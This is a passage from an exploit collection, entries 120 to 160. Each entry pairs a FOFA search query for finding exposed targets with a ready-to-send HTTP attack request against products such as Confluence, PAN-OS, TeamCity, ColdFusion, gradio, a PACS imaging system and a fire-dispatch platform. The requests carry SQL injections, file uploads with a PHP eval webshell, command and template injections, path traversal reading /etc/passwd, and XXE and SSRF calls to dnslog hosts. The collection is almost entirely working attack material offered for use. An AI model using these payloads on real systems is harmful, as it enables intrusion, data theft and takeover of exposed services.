Log in first; the default credentials are admin/admin. Then send:
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


The uploaded file is written to /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier), and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to execute
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file at the returned path: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is then reachable at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
